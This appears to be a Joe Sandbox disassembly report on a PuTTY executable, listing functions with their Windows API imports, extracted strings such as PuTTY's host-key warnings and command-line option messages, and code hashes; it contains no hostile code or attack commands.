                      • String ID: %.*s$%c%.*s$'%s' is not a valid format for a manual host key specification$-%c expects at least two colons in its argument$-agent$-cert$-hostkey$-ipv4$-ipv6$-load$-logappend$-loghost$-logoverwrite$-nc$-nc expects argument of form 'host:port'$-no-trivial-auth$-noagent$-nopageant$-nopagent$-noshare$-pageant$-pagent$-proxycmd$-pw$-pwfile$-restrict-acl$-restrict_acl$-restrictacl$-sercfg$-sessionlog$-share$-sshlog$-sshrawlog$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/cmdline.c$1.5$L%s$Unrecognised suboption "-sercfg %c"$Unrecognised suboption "-sercfg %s"$option "%s" not available in this tool$retd == 2$telnet:$the -pw option can only be used with the SSH protocol$the -pwfile option can only be used with the SSH protocol$the -sercfg option can only be used with the serial protocol$unable to open command file "%s"$unable to open password file '%s'$unable to read a password from file '%s'$unrecognised protocol prefix '%s'
                      • API String ID: 0-4105775278
                      • Opcode ID: fe1b68579080188b4da63e62e08a84ec52e6b016707625fae5bae4a074361e38
                      • Instruction ID: efc8a6457cd60ba93fba8199a2aa38165ebffef907ad74591c34c21f936ae1d6
                      • Opcode Fuzzy Hash: fe1b68579080188b4da63e62e08a84ec52e6b016707625fae5bae4a074361e38
                      • Instruction Fuzzy Hash: A8C25853F3C24361FA25A2328555BBB1E82AF85784F744030DD0EDA6DAEF6DAC05B24D
                      Function 00007FF6785F3C20 Relevance: 80.9, APIs: 43, Strings: 3, Instructions: 351windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Window$Item$Rect$Dialog$Object$Text$DestroyMessageMetricsSelectSendSystem$BrushColorCreateFontImageIndirectLoadLongModeShowStock
                      • String ID: ($<$PuTTYHostKeyMoreInfo
                      • API String ID: 3575920825-529978484
                      • Opcode ID: ee56cc1e57ec2af1323c06270b8c1a2727aa07ef82e1a07981349fbf0d6c06d2
                      • Instruction ID: 01b4f74b5e7a4101b3c27c86af37d5886354f5869f67907ac178e20c89d44143
                      • Opcode Fuzzy Hash: ee56cc1e57ec2af1323c06270b8c1a2727aa07ef82e1a07981349fbf0d6c06d2
                      • Instruction Fuzzy Hash: 1EE1823261824187FB509F66E85876BBBA1FB94BD4F104135EE4987B98CFBCD9058F04
                      Function 00007FF6785D6080 Relevance: 60.4, APIs: 40, Instructions: 426windowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Object$Text$Select$CreateDeleteMetrics$Font$ColorCompatibleInfo$AlignBitmapCharsetDestroyIconImageLoadModeOutlinePixelReleaseTranslate
                      • String ID:
                      • API String ID: 3464282134-0
                      • Opcode ID: ae0eee2e33ddb7383dd445c5378252d2129dbf155ee4a47e8564913de5b98830
                      • Instruction ID: f51d0053d3c3f67a75eaa9ce3196cd96bf180542b4ad2a6cad3855416fbd7cab
                      • Opcode Fuzzy Hash: ae0eee2e33ddb7383dd445c5378252d2129dbf155ee4a47e8564913de5b98830
                      • Instruction Fuzzy Hash: 37227B37A2864296F7508B35E89436B7BA1FB94B54F300135D94AC36A8CF3CE945EF48
                      Function 00007FF678616A00 Relevance: 58.0, APIs: 20, Strings: 13, Instructions: 230windowlibraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Object$CompatibleCreateDeleteErrorLast$AddressBitmapBitsCurrentFormatLibraryLoadMessageProcReleaseSelect
                      • String ID: $'%s': unable to open file$($6$BM$BitBlt: %s$CreateCompatibleBitmap: %s$CreateCompatibleDC(desktop window dc): %s$DwmGetWindowAttribute$GetDC(window): %s$GetDIBits (get data): %s$SelectObject: %s$dwmapi.dll
                      • API String ID: 2770305857-4119329088
                      • Opcode ID: 4884a0e50a459711fb7455f55fb7c92575f109468ebc3c8009d0d0aa29499681
                      • Instruction ID: 89a61e1b18e45fd507391e83c37c0d3e4214fd93742aaab8a823e278286b17f7
                      • Opcode Fuzzy Hash: 4884a0e50a459711fb7455f55fb7c92575f109468ebc3c8009d0d0aa29499681
                      • Instruction Fuzzy Hash: 5EA1B627E2D642A6FA509B31A44477B6B91EF84B80F744038DD0DC7796EE3CED04AB08
                      Function 00007FF67862B020 Relevance: 45.5, Strings: 36, Instructions: 473COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: %s (port %d)$%s Security Alert$(Storing this certified key in the cache will NOT cause its certification authority to be trusted for any other key or host.)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/ssh/common.c$ALSO, that key does not match the key %s had previously cached for this server.$Connection abandoned.$Full text of host's public key$Host key not in manually configured list$If you do not trust this host, %s to abandon the connection.$If you trust this host, %s to add the key to %s's cache and carry on connecting.$If you want to abandon the connection completely, %s to cancel. %s is the ONLY guaranteed safe choice.$If you want to carry on connecting but without updating the cache, %s.$If you want to carry on connecting just once, without adding the key to the cache, %s.$If you were expecting this change and trust the new key, %s to update %s's cache and carry on connecting.$MD5 fingerprint$SHA256 fingerprint$Store key in cache?$The host key does not match the one %s has cached for this server:$The host key is not cached for this server:$The new %s key fingerprint is:$The server's %s key fingerprint is:$This means that either another certification authority is operating in this realm AND the server administrator has changed the host key, or you have actually connected to another computer pretending to be the server.$This means that either another certification authority is operating in this realm, or you have actually connected to another computer pretending to be the server.$This means that either the server administrator has changed the host key, or you have actually connected to another computer pretending to be the server.$This server presented a certified host key:$Update cached key?$WARNING - POTENTIAL SECURITY BREACH!$You have no guarantee that the server is the computer you think it is.$errors-cert-mismatch$errors-hostkey-absent$errors-hostkey-wrong$one$ones$storage_status == 2$which does not match the certified key %s had previously cached for this server.$which was signed by a different certification authority from the %s %s is configured to trust for this server.
                      • API String ID: 0-2815252416
                      • Opcode ID: 70ef876f86de63405cbf83a22b8533da3d34b971eb5f9bb4d786b5b93f1f2886
                      • Instruction ID: d4142c80ad5055a790a9e5d76a9dc13cfe9eabfd2bc1f8a1b178a79439a04569
                      • Opcode Fuzzy Hash: 70ef876f86de63405cbf83a22b8533da3d34b971eb5f9bb4d786b5b93f1f2886
                      • Instruction Fuzzy Hash: 4A229823A28A45A1E654DFB2D8102FB6B61FF88B84F644032DD4D93756CF3CE945E748
                      Function 00007FF6785D9E00 Relevance: 43.2, APIs: 23, Strings: 1, Instructions: 1228COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: @
                      • API String ID: 0-2766056989
                      • Opcode ID: 5d5a8466f3f6bc00f5bdb877b93096f00b3f62bfa4cb63396af61df02b192291
                      • Instruction ID: ae6f84c9f5505ba7e93e522825b8f1435c27773a78c218324381915cc74aaeba
                      • Opcode Fuzzy Hash: 5d5a8466f3f6bc00f5bdb877b93096f00b3f62bfa4cb63396af61df02b192291
                      • Instruction Fuzzy Hash: 8BC2D133A2878286F7618B25E4803BA7BA1FB94754F204235DE8D937A4DF3CE944DB14
                      Function 00007FF6785FF060 Relevance: 30.3, Strings: 24, Instructions: 302COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: -demo-config-box$Delete$Done$Load$Load, save or delete a host CA record$Main$Name for this CA (shown in log messages)$Public key for this CA record$Public key of certification authority$Read from file$SHA-1$SHA-256$SHA-512$Save$Select public key file of certification authority$Signature types (RSA keys only):$Valid hosts this key is trusted to certify$What this CA is trusted to do$config-ssh-cert-rsa-hash$config-ssh-cert-valid-expr$config-ssh-kex-cert$loadsave$options$pubkey
                      • API String ID: 0-1462184148
                      • Opcode ID: 34e667553bc6cd5c4ee18d4e1c696b99c81178fade8a5e172059cc3577174cf9
                      • Instruction ID: 5db8baeb22f11741a6e048b38205358d3f42410622bdd5f30582743d6c1846ba
                      • Opcode Fuzzy Hash: 34e667553bc6cd5c4ee18d4e1c696b99c81178fade8a5e172059cc3577174cf9
                      • Instruction Fuzzy Hash: 28D19F33A28B4265F660DB21F8043AB7B95FB84B84F600135EA8D87B96DF3CD645D748
                      Function 00007FF67860FE90 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 251networkCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • false && "bad address family in sk_newlistener_internal", xrefs: 00007FF67861023B
                      • /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c, xrefs: 00007FF678610242
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: closesocket$ErrorLast$HandleInformationbindgetaddrinfohtonslistensetsockoptsocket
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$false && "bad address family in sk_newlistener_internal"
                      • API String ID: 2773167020-2428366578
                      • Opcode ID: feb8a1541eddb833d4c022726366f701580c58f68bb48939e8cd21e056064336
                      • Instruction ID: da1b296a83894086fe9094d3961d0ec10c48065252cffb94904ff807934f9575
                      • Opcode Fuzzy Hash: feb8a1541eddb833d4c022726366f701580c58f68bb48939e8cd21e056064336
                      • Instruction Fuzzy Hash: 23B1E823E2878692FA609B35A80037BBA61FF95750F304135DA8E877D1DF7DE8849705
                      Function 00007FF67865E3A0 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 283filememorythreadCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: File$CreateErrorLast$AllocCloseCurrentFindHandleLocalMappingNamedPipeReadThreadWaitWindowWrite
                      • String ID: Pageant$PageantRequest%08x
                      • API String ID: 2212006894-270379698
                      • Opcode ID: d5362d0f2ebea7be41a3a41264a8c73de348efe8daebd8658956fae4e399b4db
                      • Instruction ID: dd859dd705f91d8e826de88c4a40bbbd9eac0ec38f021225e57de4292c068513
                      • Opcode Fuzzy Hash: d5362d0f2ebea7be41a3a41264a8c73de348efe8daebd8658956fae4e399b4db
                      • Instruction Fuzzy Hash: 0DB1D227B2874251EA509B36A44477B6B91FF85BD4F240530EE5E87BD6DF3CE8409708
                      Function 00007FF6785DB9B0 Relevance: 26.0, APIs: 17, Instructions: 510windowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Rect$ClientDeleteObject$DestroyIconInvalidateWindowZoomed
                      • String ID:
                      • API String ID: 1563564061-0
                      • Opcode ID: 9002f2a3961424ae94d7a4714d7ef1378bbf2c322a05b47b82e6b32c1cd67208
                      • Instruction ID: 616df6a09d9a7e387e039d05248c8bbcfaafccdfc50c7c907fba861066a1e765
                      • Opcode Fuzzy Hash: 9002f2a3961424ae94d7a4714d7ef1378bbf2c322a05b47b82e6b32c1cd67208
                      • Instruction Fuzzy Hash: C9324F739286129BE344CB39E88062A7BA1FB94764F244535D91DC3BA4DE3CFC459F48
                      Function 00007FF6786B1A94 Relevance: 25.7, APIs: 9, Strings: 5, Instructions: 1203COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$MZx
                      • API String ID: 808467561-2638907429
                      • Opcode ID: 76109444bee550de1c4388e330ad174438b70be0a494ba9c3e13dd96a3241d5f
                      • Instruction ID: aebd94a811b8e4f142f9c55a0b1e334e7a0f80ac0216b803e87846e9a9d17ff1
                      • Opcode Fuzzy Hash: 76109444bee550de1c4388e330ad174438b70be0a494ba9c3e13dd96a3241d5f
                      • Instruction Fuzzy Hash: 2EB29073A282829BE7658E74D5407FE2FE2FB54388F705135EA0997B84DF38A901DB44
                      Function 00007FF6785F4C30 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 223windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: RectWindow$Dialog$MessageSend$CreateItemShow
                      • String ID: EDIT$STATIC
                      • API String ID: 2330346805-43825268
                      • Opcode ID: 6e7706600d2d904500700ed94df90ccb8346061f418200c8f03e5ae947f2dfbc
                      • Instruction ID: e0a500f4ff6bdd7c329f685893ea18433d98e1408572c0e534bdb42027a30c3a
                      • Opcode Fuzzy Hash: 6e7706600d2d904500700ed94df90ccb8346061f418200c8f03e5ae947f2dfbc
                      • Instruction Fuzzy Hash: 23A159766187808AE760CB26F84476BBBA1FBD9B84F604025DA8D87B58CF7CD945CF04
                      Function 00007FF67869BB90 Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 337COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _invalid_parameter_noinfo$Module$FileHandleName
                      • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program:
                      • API String ID: 3031022502-1508414584
                      • Opcode ID: d7d843c2f65a12b0c34e94e771a953dbeb68fb05c278f58f0e75c4f794b81323
                      • Instruction ID: bbe3481c26e9d491cfea18c64c9b16b17751947e330004beb81832286aef1cae
                      • Opcode Fuzzy Hash: d7d843c2f65a12b0c34e94e771a953dbeb68fb05c278f58f0e75c4f794b81323
                      • Instruction Fuzzy Hash: ACC13953F28353A0FA109B72A9106B76A65AF64FC0F604036DD0DD3BD1EE3DED00A649
                      Function 00007FF6785D1EED Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 328windowtimeCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CaptureCursorKeyboardMessageState$InfoLongMonitorReleaseSendShowTimeWindowZoomed
                      • String ID: (
                      • API String ID: 760066194-3887548279
                      • Opcode ID: 570241226dc569d8556a6d44eafd03aa757bfd8765273278d836e16b3d774ded
                      • Instruction ID: d45b6c4a58dfb675d28792fcfcb9c5b5baa0f5c019dbf7b4388620bb992bf072
                      • Opcode Fuzzy Hash: 570241226dc569d8556a6d44eafd03aa757bfd8765273278d836e16b3d774ded
                      • Instruction Fuzzy Hash: 77D1A027E3C6968AF7A48B35988537A6E90AF94750F340435CD4EC3A95CE6CFD40EB18
                      Function 00007FF67860F260 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 188networkCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: htonl$HandleInformationIoctlsocket
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$addr->addresses && step.curraddr < addr->naddresses$family == AF_UNSPEC
                      • API String ID: 156137457-251196645
                      • Opcode ID: 8971d0b1c7270a30c2299cc67f2fcacbd3c90aabaff784f71aa1d9edac9d5cce
                      • Instruction ID: c3ef669a9fe98795e55b86e54d756cae807fae75fca02037770e4c92e38f428c
                      • Opcode Fuzzy Hash: 8971d0b1c7270a30c2299cc67f2fcacbd3c90aabaff784f71aa1d9edac9d5cce
                      • Instruction Fuzzy Hash: C981D123A3860292FB648B249490A3A6AA0EF95760F244236D95DC77D4DF7CEC41DB4C
